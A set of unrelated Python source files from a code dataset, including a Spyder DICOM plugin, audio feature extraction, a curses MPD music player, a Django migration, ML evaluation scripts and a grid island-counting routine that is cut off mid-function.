4803286 | <filename>spyder/plugins/io_dcm/__init__.py<gh_stars>1000+
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009- Spyder Project Contributors
#
# Distributed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
# =============================================================================
# The following statements are required to register this I/O plugin:
# =============================================================================
from .plugin import load_dicom
FORMAT_NAME = "DICOM images"
FORMAT_EXT = ".dcm"
FORMAT_LOAD = load_dicom
FORMAT_SAVE = None
| StarcoderdataPython |
1721228 | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 9 12:12:48 2021
@author: rdavi
Preprocess datasets, including silence trimming and spliting in 1s chunks
"""
# %% Import libraries
import os
import numpy as np
import opensmile
import pickle
import librosa
import matplotlib.pyplot as plt
# %% Define the dataset
dataset = 'DEMOS'
# dataset = 'RAVDESS'
# dataset = 'TESS'
# dataset = 'AEMOTION'
path = '../../data/raw/' +dataset+ '_Emotions/'
# %% Extract features
def load_wav(filename):
# Load and resample
audio, fs = librosa.load(filename, sr = 16000)
# Silence trim
interv = librosa.effects.split(audio, top_db=20, frame_length=4096, hop_length=1)
start, end = interv[0]
audio_out = audio[start : end]
return audio_out, fs
# Initialize opensmile feature set
smile = opensmile.Smile(feature_set=opensmile.FeatureSet.eGeMAPSv02,
feature_level=opensmile.FeatureLevel.LowLevelDescriptors)
# Sweep
lst = []
i = -2
duration = 3 # define signal duration in each chunk
for subdir, dirs, files in os.walk(path):
i+=1
print(subdir)
print(i)
for file in files:
# Load file
filename = os.path.join(subdir,file)
data, Fs = load_wav(filename)
# # Make chunks
N = int(np.floor(duration*Fs)) # Number of samples in two second
data_chunk = np.empty(shape=(N))
if np.size(data) > N:
data = data[:N]
data_chunk[:np.size(data)] = data
# Opensmile
X_smile = smile.process_signal(data_chunk, Fs)
# Append to list
arr = X_smile.values, i
lst.append(arr)
# %% Save smile dataset
X, y = zip(*lst)
X, y = np.asarray(X), np.asarray(y)
with open('../../data/processed/dataset_smile_' +dataset+ '.pckl', 'wb') as f:
pickle.dump([X, y], f)
print("All done!")
# %%
| StarcoderdataPython |
3329321 | <gh_stars>1-10
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import sys
import pytest
from click.testing import CliRunner
sys.path.append('..')
from app import main
def config(tmpdir):
os.environ['JINA_DATA_FILE'] = os.path.join(os.path.dirname(__file__), 'toy-input.txt')
os.environ['JINA_WORKSPACE'] = os.path.join(tmpdir, 'workspace')
# TODO: query_restful is not covered.
@pytest.mark.parametrize('task_para',
[('index',
'Their land was taken back by the Spanish Crown',
'California became part of the United States',
'> 49('),
('index_incremental',
'<NAME>',
'multi-Emmy Award Winning American',
'> 99(')
])
def test_wikipediasearch_index(tmpdir, task_para):
task_str, input_str, output_str, last_str = task_para
config(tmpdir)
runner = CliRunner()
result = runner.invoke(main, ['-t', task_str])
assert 'done in' in result.stdout
result = runner.invoke(main, ['-t', 'query', '-k', '200'], input=input_str)
assert output_str in result.stdout
assert last_str in result.stdout
| StarcoderdataPython |
116193 | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferImage
class ImageReaderPathPreview( GafferUI.PathPreviewWidget ) :
def __init__( self, path ) :
column = GafferUI.SplitContainer( GafferUI.SplitContainer.Orientation.Vertical )
GafferUI.PathPreviewWidget.__init__( self, column, path )
self.__script = Gaffer.ScriptNode( "imagePreview" )
self.__script["ImageReader"] = GafferImage.ImageReader()
with column :
self.__viewer = GafferUI.Viewer( self.__script )
GafferUI.Timeline( self.__script )
self._updateFromPath()
def isValid( self ) :
path = self.getPath()
if not isinstance( path, ( Gaffer.FileSystemPath, Gaffer.SequencePath ) ) or not path.isLeaf() :
return False
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
ext = sequence.fileName.split( "." )[-1]
except :
return False
else :
ext = str(path).split( "." )[-1]
return ext in GafferImage.ImageReader.supportedExtensions()
def _updateFromPath( self ) :
if not self.isValid() :
self.__script.selection().clear()
return
path = self.getPath()
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
except :
return
fileName = sequence.fileName
frames = sequence.frameList.asList()
else :
fileName = str( path )
frames = None
self.__script["ImageReader"]["fileName"].setValue( fileName )
if frames :
self.__script.context().setFrame( frames[0] )
self.__script["frameRange"]["start"].setValue( frames[0] )
self.__script["frameRange"]["end"].setValue( frames[-1] )
GafferUI.Playback.acquire( self.__script.context() ).setFrameRange( frames[0], frames[-1] )
self.__script.selection().add( self.__script["ImageReader"] )
with self.__script.context() :
viewport = self.__viewer.viewGadgetWidget().getViewportGadget()
if viewport.getPrimaryChild() is not None :
viewport.frame( viewport.getPrimaryChild().bound() )
GafferUI.PathPreviewWidget.registerType( "Image", ImageReaderPathPreview )
| StarcoderdataPython |
3228186 | #!/bin/python
import curses
import os
from mpd import MPDClient
import ffmpeg
import pixcat
import time
import configparser
import ueberzug.lib.v0 as ueberzug
from PIL import Image, ImageDraw
# Get config
config = configparser.ConfigParser()
config.read(os.path.expanduser("~/.config/miniplayer/config"))
if "player" not in config.sections():
config["player"] = {"music_directory": "~/Music",
"font_width": 11,
"font_height": 24,
"image_method": "pixcat",
"album_art_only": False,
"volume_step": 5,
"auto_close": False,
"show_playlist": True,
}
if "mpd" not in config.sections():
config["mpd"] = {"host": "localhost",
"port": "6600",
}
# Initialise keybindings
default_bindings = {">": "next_track",
"<": "last_track",
"+": "volume_up",
"-": "volume_down",
"p": "play_pause",
"q": "quit",
"h": "help",
"i": "toggle_info",
"down": "select_down",
"up": "select_up",
"enter": "select"
}
if "keybindings" not in config.sections():
config["keybindings"] = default_bindings
# Load configured keybindings
keybindings = config["keybindings"]
# Unbound actions get initialised with their default keys
# except if the keys are being used for something else
for key, action in default_bindings.items():
if (
action not in keybindings.values()
and key not in keybindings.keys()
):
keybindings[key] = action
player_config = config["player"]
mpd_config = config["mpd"]
# FPS
FPS = 20
# Image ratio
# Change this to match the (width, height) of your font.
IMAGERATIO = (player_config.getint("font_width", 11),
player_config.getint("font_height", 24)
)
# Music directory
MUSICDIR = player_config.get("music_directory", "~/Music")
MUSICDIR = os.path.expanduser(MUSICDIR)
# MPD config
MPDHOST = mpd_config.get("host", "localhost")
MPDPORT = mpd_config.getint("port", 6600)
MPDPASS = mpd_config.get("pass", False)
# What to use to draw images
IMAGEMETHOD = player_config.get("image_method", "pixcat")
# Volume step
VOLUMESTEP = player_config.getint("volume_step", 5)
# Autoclose boolean
AUTOCLOSE = player_config.getboolean("auto_close", False)
# Playlist padding
PLAYLISTMARGIN = 4
# Config option to display the playlist
DISABLEPLAYLIST = not player_config.getboolean("show_playlist", True)
def albumArtSize(album_space, window_width):
"""
Calculates the album art size given the window width and the height
of the album art space
"""
if window_width * IMAGERATIO[0] > album_space * IMAGERATIO[1]:
image_width_px = album_space * IMAGERATIO[1]
else:
image_width_px = window_width * IMAGERATIO[0]
image_width = int(image_width_px // IMAGERATIO[0])
image_height = int(image_width_px // IMAGERATIO[1])
return image_width_px, image_width, image_height
class Player:
def __init__(self):
# Curses initialisation
self.stdscr = curses.initscr()
self.stdscr.nodelay(True)
self.stdscr.keypad(True)
# Curses config
curses.noecho()
curses.curs_set(0)
curses.cbreak()
curses.start_color()
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_GREEN, -1)
curses.init_pair(2, curses.COLOR_YELLOW, -1)
# MPD init
self.client = MPDClient()
self.client.connect(MPDHOST, MPDPORT)
if MPDPASS:
self.client.password(MP<PASSWORD>)
self.last_song = None
# Try to load default playlist from config
default = player_config.get("default_playlist", None)
# Check if its appropriate to load the default playlist
if default and self.client.playlist() == []:
self.client.load(default)
# Album art only flag
self.album_art_only = player_config.getboolean("album_art_only", False)
# Store the status on startup so we can reset when exiting
status = self.client.status()
self.stored_repeat_state = int(status["repeat"])
self.stored_shuffle_state = int(status["random"])
# Screen size
maxyx = self.stdscr.getmaxyx()
self.screen_height, self.screen_width = maxyx
# Album art window
self.art_window_height, self.art_window_width = self.albumArtWinWidth(*maxyx)
self.art_win = curses.newwin(
self.art_window_height, self.art_window_width,
0, 0
)
# Playlist window
if self.playlistFits(*maxyx) and not self.album_art_only:
self.draw_playlist = True
self.playlist_window_width = maxyx[1] - self.art_window_width - PLAYLISTMARGIN
self.playlist_window_height = maxyx[0]
self.playlist_win = curses.newwin(
self.playlist_window_height, self.playlist_window_width,
0, self.art_window_width + PLAYLISTMARGIN
)
else:
self.draw_playlist = False
self.playlist_win = None
self.text_start = int(self.art_window_height - 5)
self.album_space = self.text_start - 2
# Calculate the size of the image
self.image_width_px, self.image_width, self.image_height = albumArtSize(self.album_space, self.art_window_width)
self.image_y_pos = (self.album_space - self.image_height) // 2 + 1
# Album art location
self.album_art_loc = "/tmp/aartminip.png"
# Toggle for help menu
self.help = False
self.cleared = False
# Ueberzug placement
self.art_placement = None
# Update needed flag
self.update_needed = False
# Flag to check if any music has been played
self.has_music_been_played = False
# A counter to check how long since playlist has moved
self.control_cycle = 0
# Selected song in playlist
self.selected_song = 0
def playlistFits(self, height, width):
"""
A function that checks if the playlist display should be drawn
based on the provided height and width
"""
return height / width < 1/3 and not DISABLEPLAYLIST
def albumArtWinWidth(self, height, width):
"""
A function that calculates the album art window height and
width based on the window height and width
"""
if self.playlistFits(height, width) and not self.album_art_only:
return height, round(width * 2/5)
else:
return height, width
def fitText(self):
"""
A function that fits album name, artist name and song name
to the screen with the given width.
"""
state = 0
song = self.title
album = self.album
artist = self.artist
width = self.art_window_width
if len(song) > width:
song = song[:width - len(song)]
song = song[:-4].strip() + "..."
if len(album) == 0:
sep = 0
else:
sep = 3
if len(artist) + len(album) + sep > width:
state = 1
if len(artist) > width:
artist = artist[:width - len(artist)]
artist = artist[:-4].strip() + "..."
if len(album) > width:
album = album[:width - len(album)]
album = album[:-4].strip() + "..."
if len(album) == 0:
state = 2
return (state, album, artist, song)
def updateWindowSize(self, force_update=False):
"""
A function to check if the window size changed
"""
window_height, window_width = self.stdscr.getmaxyx()
if (window_height, window_width) != (self.screen_height, self.screen_width) or force_update:
self.draw_playlist = self.playlistFits(window_height, window_width) and not self.album_art_only
# Album art window
self.art_window_height, self.art_window_width = self.albumArtWinWidth(window_height, window_width)
# Playlist window
if self.draw_playlist:
self.playlist_window_width = window_width - self.art_window_width - PLAYLISTMARGIN
self.playlist_window_height = window_height
# Close the playlist window if it exists
elif self.playlist_win is not None:
del self.playlist_win
self.playlist_win = None
# Check if we are drawing info
if self.album_art_only:
self.text_start = int(self.art_window_height)
self.album_space = self.text_start - 1
else:
self.text_start = int(self.art_window_height - 5)
self.album_space = self.text_start - 2
# Calculate the size of the image
self.image_width_px, self.image_width, self.image_height = albumArtSize(self.album_space, self.art_window_width)
self.image_y_pos = (self.album_space - self.image_height) // 2 + 1
# Check if playlist window exists and if we are drawing it
if self.playlist_win is not None and self.draw_playlist:
self.playlist_win.clear()
self.playlist_win.refresh()
self.playlist_win.resize(
self.playlist_window_height,
self.playlist_window_width
)
self.playlist_win.mvwin(0, self.art_window_width + PLAYLISTMARGIN)
elif self.draw_playlist:
self.playlist_win = curses.newwin(
self.playlist_window_height, self.playlist_window_width,
0, self.art_window_width + PLAYLISTMARGIN
)
self.last_song = None
# Resize the window
self.art_win.clear()
self.art_win.resize(self.art_window_height, self.art_window_width)
self.screen_height, self.screen_width = window_height, window_width
def getAlbumArt(self, song_file):
"""
A function that extracts the album art from song_file and
saves it to self.album_art_loc
"""
song_file_abs = os.path.join(MUSICDIR, song_file)
process = (
ffmpeg
.input(song_file_abs)
.output(self.album_art_loc)
)
try:
process.run(quiet=True, overwrite_output=True)
except ffmpeg._run.Error:
foregroundCol = "#D8DEE9"
backgroundCol = "#262A33"
size = 512*4
art = Image.new("RGB", (size, size), color=backgroundCol)
d = ImageDraw.Draw(art)
for i in range(4):
offset = (i - 2) * 70
external = size/3
x0 = round(external) - offset
y0 = round(external) + offset
x1 = round(external*2) - offset
y1 = round(external*2) + offset
externalyx = [(x0, y0), (x1, y1)]
d.rectangle(externalyx, outline=foregroundCol, width=40)
art.resize((512, 512))
art.save(self.album_art_loc, "PNG")
def getSongInfo(self, song):
"""
A function that returns a tuple of the given songs
album, artist, title
if they do not exist, the function will return
"", "", filename respectively
"""
try:
album = song["album"]
except KeyError:
album = ""
try:
artist = song["artist"]
except KeyError:
artist = ""
try:
title = song["title"]
except KeyError:
# If no title, use base file name
aux = song["file"]
aux = os.path.basename(aux)
title = aux
return album, artist, title
def checkSongUpdate(self):
"""
Checks if there is a new song playing
Returns:
1 -- if song state is "stop"
0 -- if there is no change
2 -- if there is a new song
"""
status = self.client.status()
if status["state"] == "stop":
return 1
song = self.client.currentsong()
self.elapsed = float(status["elapsed"])
self.duration = float(status["duration"])
self.progress = self.elapsed/self.duration
if self.last_song != song:
self.art_win.clear()
# Move selected_song to the currently playing one
if self.control_cycle == 0:
self.selected_song = int(song["pos"])
self.album, self.artist, self.title = self.getSongInfo(song)
self.last_song = song
self.getAlbumArt(song["file"])
self.last_song = song
return 0
else:
return 2
def toggleInfo(self):
"""
A function that toggles the display of track info
"""
self.album_art_only = not self.album_art_only
self.updateWindowSize(force_update=True)
self.art_win.clear()
self.art_win.refresh()
def handleKeypress(self):
"""
A function to handle keypresses
Keys:
'>' -- Next track
'<' -- Last track
'+' -- Volume up +5
'-' -- Volume down -5
'p' -- Play/pause
'q' -- Quit
'h' -- Help
"""
anytime_keys = ["quit", "help", "select_up", "select_down", "select"]
special_key_map = {curses.KEY_UP: "up",
curses.KEY_DOWN: "down",
curses.KEY_LEFT: "left",
curses.KEY_RIGHT: "right",
curses.KEY_ENTER: "enter",
10: "enter",
32: "space"
}
if self.checkSongUpdate() == 1:
stopped = True
else:
stopped = False
# Get key
key = self.stdscr.getch()
while key > 0:
# Resolve every key in buffer
if key in special_key_map.keys():
keyChar = special_key_map[key]
else:
keyChar = chr(key).lower()
# Get playlist length
playlist_length = len(self.client.playlist())
# Parse key
if keyChar not in keybindings.keys():
key = self.stdscr.getch()
continue
else:
action = keybindings[keyChar]
if stopped and action not in anytime_keys:
key = self.stdscr.getch()
continue
if action == "next_track":
self.client.next()
self.update_needed = True
elif action == "last_track":
self.client.previous()
self.update_needed = True
elif action == "play_pause":
self.client.pause()
elif action == "volume_up":
self.client.volume(str(VOLUMESTEP))
elif action == "volume_down":
self.client.volume(str(-VOLUMESTEP))
elif action == "quit":
raise KeyboardInterrupt
elif action == "help":
self.help = not self.help
self.cleared = False
self.update_needed = True
elif action == "toggle_info":
self.toggleInfo()
self.update_needed = True
elif action == "select_up":
self.control_cycle = 1
if playlist_length > 0:
self.selected_song = (self.selected_song - 1) % playlist_length
self.update_needed = True
elif action == "select_down":
self.control_cycle = 1
if playlist_length > 0:
self.selected_song = (self.selected_song + 1) % playlist_length
self.update_needed = True
elif action == "select":
self.control_cycle = 1
if playlist_length > 0:
self.client.play(self.selected_song % playlist_length)
self.update_needed = True
self.last_song = None
elif action == "repeat_toggle":
self.client.repeat(0 if self.client.status()["repeat"] == "1" else 1)
elif action == "random_toggle":
self.client.random(0 if self.client.status()["random"] == "1" else 1)
key = self.stdscr.getch()
def drawInfo(self):
"""
A function to draw the info below the album art
"""
state, album, artist, title = self.fitText()
if len(self.artist) == 0:
seperator = ""
else:
seperator = " - "
if state == 0:
# Everything fits
self.art_win.addstr(self.text_start, 0, f"{title}")
self.art_win.addstr(self.text_start + 1, 0, f"{artist}{seperator}{album}")
elif state == 1:
# Too wide
self.art_win.addstr(self.text_start - 1, 0, f"{title}")
self.art_win.addstr(self.text_start, 0, f"{album}")
self.art_win.addstr(self.text_start + 1, 0, f"{artist}")
else:
# No album
self.art_win.addstr(self.text_start, 0, f"{title}")
self.art_win.addstr(self.text_start + 1, 0, f"{artist}")
# Progress bar
song_duration = (int(self.duration / 60), round(self.duration % 60))
song_elapsed = (int(self.elapsed / 60), round(self.elapsed % 60))
self.art_win.addstr(
self.text_start + 2, 0,
"-"*(int((self.art_window_width - 1) * self.progress)) + ">",
curses.color_pair(1)
)
# Duration string
time_string = f"{song_elapsed[0]}:{song_elapsed[1]:02d}/{song_duration[0]}:{song_duration[1]:02d}"
# rewritten, as f string justification didnt play nice with printing on the same line
# seems ok from preliminary testing but dont want to assume
self.art_win.addstr(
self.text_start + 3, self.art_win.getmaxyx()[1]-len(time_string),
f"{time_string}",
curses.color_pair(2)
)
if self.client.status()["repeat"] == "1":
self.art_win.addstr(self.text_start+3, 0, "rpt", curses.color_pair(2))
else:
self.art_win.addstr(self.text_start+3, 0, "rpt")
if self.client.status()["random"] == "1":
self.art_win.addstr(self.text_start+4, 0, "shf", curses.color_pair(2))
else:
self.art_win.addstr(self.text_start+4, 0, "shf")
self.art_win.refresh()
def drawPlaylist(self):
"""
A function that draws the playlist
"""
# Draw playlist
if not self.draw_playlist:
return
playlist = self.client.playlistinfo()
current_song = self.client.currentsong()
# selected_pos = int(current_song["pos"])
playlist_length = len(self.client.playlist())
if playlist_length == 0:
selected_pos = 0
self.playlist_win.erase()
self.playlist_win.refresh()
return
selected_pos = self.selected_song % len(playlist)
# Determine where to start the playlist
if selected_pos > self.playlist_window_height // 2 and len(playlist) > self.playlist_window_height:
start = selected_pos - (self.playlist_window_height - 1) // 2
else:
start = 0
start = min(abs(len(playlist) - self.playlist_window_height), start)
line = 0
while line < self.playlist_window_height:
# Check if playlist is empty
if line + start < len(playlist):
playlist_item = playlist[start + line]
else:
playlist_item = None
# Decide color
pair = 0
if playlist_item == current_song:
pair = curses.color_pair(2)
if playlist_item == playlist[selected_pos]:
pair = curses.color_pair(2) | curses.A_REVERSE
# Move and write text
try:
self.playlist_win.move(line, 0)
if playlist_item is not None:
_, artist, title = self.getSongInfo(playlist_item)
if artist == "":
sep = ""
else:
sep = " - "
self.playlist_win.addstr(
f"{artist}{sep}{title}"[:self.playlist_window_width - 1],
pair
)
self.playlist_win.clrtoeol()
except curses.error:
return
line += 1
self.playlist_win.refresh()
def hideAlbumArt(self):
"""
A function that hides the album art
"""
if IMAGEMETHOD == "ueberzug":
self.art_placement.visibility = ueberzug.Visibility.INVISIBLE
def drawAlbumArt(self):
"""
A function to draw the album art
"""
if IMAGEMETHOD == "ueberzug":
# Figure out new placement
self.art_placement.x = (self.art_window_width - self.image_width)//2
self.art_placement.y = self.image_y_pos
# Figure out height and width
self.art_placement.width = self.image_width
self.art_placement.height = self.album_space
# Update image
self.art_placement.path = self.album_art_loc
# Display image
self.art_placement.visibility = ueberzug.Visibility.VISIBLE
elif IMAGEMETHOD == "pixcat":
(
pixcat.Image(self.album_art_loc)
.thumbnail(self.image_width_px)
.show(x=(self.art_window_width - self.image_width)//2, y=self.image_y_pos)
)
def centerText(self, y: int, string: str):
"""
A function that draws centered text in the window
given a string and a line.
Arguments:
y -- The y position to draw the string
string -- The string to draw
"""
x_pos = self.art_window_width / 2 - len(string) / 2
self.art_win.addstr(y, int(x_pos), string)
def drawHelp(self):
"""
The function that draws the keymap help
"""
# Top vspace
top_vspace = 3
# Left and right margin pct
lr_margin_pct = 0.1
lr_margin = round(self.art_window_width * lr_margin_pct)
# Actual space for text
x_space = self.art_window_width - 2 * (lr_margin)
# Check if window has been cleared
if not self.cleared:
self.art_win.clear()
self.cleared = True
# Figure out center, y_start and x_start
y_start = top_vspace
x_start = int(lr_margin)
# Draw title
self.centerText(y_start, "Keymap")
# Draw help
for key, desc in keybindings.items():
y_start += 1
sep = "." * (x_space - len(key) - len(desc) - 2)
desc = desc.replace("_", " ").capitalize()
self.art_win.addstr(y_start, x_start, f"{key} {sep} {desc}")
self.art_win.refresh()
def draw(self):
"""
The function that draws the now playing window
"""
if not self.cleared:
self.art_win.clear()
self.cleared = True
# Force window nings
self.art_win.redrawln(0, 1)
self.art_win.addstr(0, 0, " ")
# Get mpd state
state = self.checkSongUpdate()
# Check if state is stop
if state == 1:
if self.has_music_been_played and AUTOCLOSE:
# Check if the playlist has concluded and if we should close
raise KeyboardInterrupt
self.art_win.clear()
self.hideAlbumArt()
infomsg = "Put some beats on!"
self.art_win.addstr(self.art_window_height // 2, (self.art_window_width - len(infomsg)) // 2, infomsg)
self.art_win.refresh()
self.drawPlaylist()
return
self.has_music_been_played = True
# Draw the window
if not self.album_art_only:
self.drawInfo()
self.drawPlaylist()
self.drawAlbumArt()
@ueberzug.Canvas()
def loop(self, canvas):
"""
The main program loop
"""
if self.art_placement is None and IMAGEMETHOD == "ueberzug":
# Create album art placement if we are using ueberzug
self.art_placement = canvas.create_placement(
"art",
scaler=ueberzug.ScalerOption.FIT_CONTAIN.value
)
# Check if we need to recalculate window size
# because of album art only initially
if self.album_art_only:
self.updateWindowSize(force_update=True)
try:
i = 0
while True:
s = time.perf_counter()
self.handleKeypress()
if i == 0 or self.update_needed:
# Checko for window size update
self.updateWindowSize()
if not self.help:
self.draw()
else:
self.hideAlbumArt()
self.drawHelp()
self.update_needed = False
# Update control_cycle once a second if it is not 0
if i == 0 and self.control_cycle != 0:
self.control_cycle = (self.control_cycle + 1) % 30
e = time.perf_counter()
sleeptime = abs(1/FPS - (e-s))
time.sleep(sleeptime)
i = (i + 1) % FPS
except KeyboardInterrupt:
error = False
except pixcat.terminal.KittyAnswerTimeout:
error = "Kitty did not answer in time. Are you using Kitty?"
except Exception as e:
error = e
# lets the finally clause handle a unexpected error
finally:
curses.nocbreak()
curses.endwin()
# Restore "old" mpd settings
self.client.repeat(self.stored_repeat_state)
self.client.random(self.stored_shuffle_state)
self.client.close()
self.client.disconnect()
if error:
print(error)
try:
player = Player()
player.loop()
except ConnectionRefusedError:
curses.nocbreak()
curses.endwin()
print(f"Could not connect to mpd on {MPDHOST}:{MPDPORT}")
| StarcoderdataPython |
1702884 | <reponame>morlandi/django-email-test
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-05-10 17:42
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django_email_test.models
class Migration(migrations.Migration):
dependencies = [
('django_email_test', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='testemail',
name='bcc',
field=models.TextField(blank=True, default=''),
),
migrations.AlterField(
model_name='testemail',
name='body',
field=models.TextField(default="Here's some default text."),
),
migrations.AlterField(
model_name='testemail',
name='date',
field=models.DateTimeField(default=datetime.datetime.now, help_text='The date you want to set as the date header.'),
),
migrations.AlterField(
model_name='testemail',
name='error',
field=models.TextField(blank=True, default='', editable=False),
),
migrations.AlterField(
model_name='testemail',
name='from_email',
field=models.CharField(default=django_email_test.models.test_email_default_from_email, max_length=150, verbose_name='from'),
),
migrations.AlterField(
model_name='testemail',
name='subject',
field=models.CharField(default='This is a test email.', max_length=150),
),
migrations.AlterField(
model_name='testemail',
name='to',
field=models.TextField(blank=True, default=''),
),
]
| StarcoderdataPython |
115991 | <reponame>e-orlov/autosklearn-zeroconf
# -*- coding: utf-8 -*-
"""
Copyright 2017 <NAME>
Created on Sun Apr 23 11:52:59 2017
@author: ekobylkin
This is an example on how to prepare data for autosklearn-zeroconf.
It is using a well known Adult (Salary) dataset from UCI https://archive.ics.uci.edu/ml/datasets/Adult .
"""
import pandas as pd
test = pd.read_csv(filepath_or_buffer='./data/adult.test.withid',sep=',', error_bad_lines=False, index_col=False)
#print(test)
prediction = pd.read_csv(filepath_or_buffer='./data/zeroconf-result.csv',sep=',', error_bad_lines=False, index_col=False)
#print(prediction)
df=pd.merge(test, prediction, how='inner', on=['cust_id',])
y_test=df['category']
y_hat=df['prediction']
from sklearn.metrics import (confusion_matrix, precision_score
, recall_score, f1_score, accuracy_score)
from time import time,sleep,strftime
def p(text):
for line in str(text).splitlines():
print ('[ZEROCONF] '+line+" # "+strftime("%H:%M:%S")+" #")
p("\n")
p("#"*72)
p("Accuracy score {0:2.0%}".format(accuracy_score(y_test, y_hat)))
p("The below scores are calculated for predicting '1' category value")
p("Precision: {0:2.0%}, Recall: {1:2.0%}, F1: {2:.2f}".format(
precision_score(y_test, y_hat),recall_score(y_test, y_hat),f1_score(y_test, y_hat)))
p("Confusion Matrix: https://en.wikipedia.org/wiki/Precision_and_recall")
p(confusion_matrix(y_test, y_hat))
baseline_1 = str(sum(a for a in y_test))
baseline_all = str(len(y_test))
baseline_prcnt = "{0:2.0%}".format( float(sum(a for a in y_test)/len(y_test)))
p("Baseline %s positives from %s overall = %1.1f%%" %
(sum(a for a in y_test), len(y_test), 100*sum(a for a in y_test)/len(y_test)))
p("#"*72)
p("\n")
| StarcoderdataPython |
3398227 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A naive bayes program using MLlib.
This example requires NumPy (http://www.numpy.org/).
"""
import sys
from pyspark import SparkContext
from pyspark.mllib.util import MLUtils
from pyspark.mllib.classification import NaiveBayes
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.linalg import Vectors
from pyspark.storagelevel import StorageLevel
from operator import add
from itertools import groupby
#
# Adopted from spark's doc: http://spark.apache.org/docs/latest/mllib-naive-bayes.html
#
def parseVector(line):
return np.array([float(x) for x in line.split(' ')])
if __name__ == "__main__":
if len(sys.argv) != 2:
print >> sys.stderr, "Usage: bayes <file>"
exit(-1)
sc = SparkContext(appName="PythonNaiveBayes")
filename = sys.argv[1]
data = sc.sequenceFile(filename, "org.apache.hadoop.io.Text", "org.apache.hadoop.io.Text")
wordCount = data \
.flatMap(lambda (key, doc):doc.split(" ")) \
.map(lambda x:(x, 1)) \
.reduceByKey(add)
wordSum = wordCount.map(lambda x:x[1]).reduce(lambda x,y:x+y)
wordDict = wordCount.zipWithIndex() \
.map(lambda ((key, count), index): (key, (index, count*1.0 / wordSum)) ) \
.collectAsMap()
sharedWordDict = sc.broadcast(wordDict)
# for each document, generate vector based on word freq
def doc2vector(dockey, doc):
# map to word index: freq
# combine freq with same word
docVector = [(key, sum((z[1] for z in values))) for key, values in
groupby(sorted([sharedWordDict.value[x] for x in doc.split(" ")],
key=lambda x:x[0]),
key=lambda x:x[0])]
(indices, values) = zip(*docVector) # unzip
label = float(dockey[6:])
return label, indices, values
vector = data.map( lambda (dockey, doc) : doc2vector(dockey, doc))
vector.persist(StorageLevel.MEMORY_ONLY)
d = vector.map( lambda (label, indices, values) : indices[-1] if indices else 0)\
.reduce(lambda a,b:max(a,b)) + 1
# print "###### Load svm file", filename
#examples = MLUtils.loadLibSVMFile(sc, filename, numFeatures = numFeatures)
examples = vector.map( lambda (label, indices, values) : LabeledPoint(label, Vectors.sparse(d, indices, values)))
examples.cache()
# FIXME: need randomSplit!
training = examples.sample(False, 0.8, 2)
test = examples.sample(False, 0.2, 2)
numTraining = training.count()
numTest = test.count()
print " numTraining = %d, numTest = %d." % (numTraining, numTest)
model = NaiveBayes.train(training, 1.0)
model_share = sc.broadcast(model)
predictionAndLabel = test.map( lambda x: (x.label, model_share.value.predict(x.features)))
# prediction = model.predict(test.map( lambda x: x.features ))
# predictionAndLabel = prediction.zip(test.map( lambda x:x.label ))
accuracy = predictionAndLabel.filter(lambda x: x[0] == x[1]).count() * 1.0 / numTest
print "Test accuracy = %s." % accuracy
| StarcoderdataPython |
3240297 | import numpy as np
def preprocess(arr):
# Set to 0/1 pixels for island calculations
b = arr > 0
b = b.astype(int)
return b
def dfs(arr, x, y, area=False):
h, w = arr.shape
arr[x][y] = 0
adjacent = [(x-1, y), (x+1, y), (x, y-1), (x, y+1)]
num = 1
for row, col in adjacent:
valid_row = row >= 0 and row < h
valid_col = col >= 0 and col < w
if valid_col and valid_row and arr[row][col] == 1:
num += dfs(arr, row, col)
return num
def calc(arr):
# Builds on Island problem
x, y = arr.shape
islands = 0
areas = []
for i in range(x):
for j in range(y):
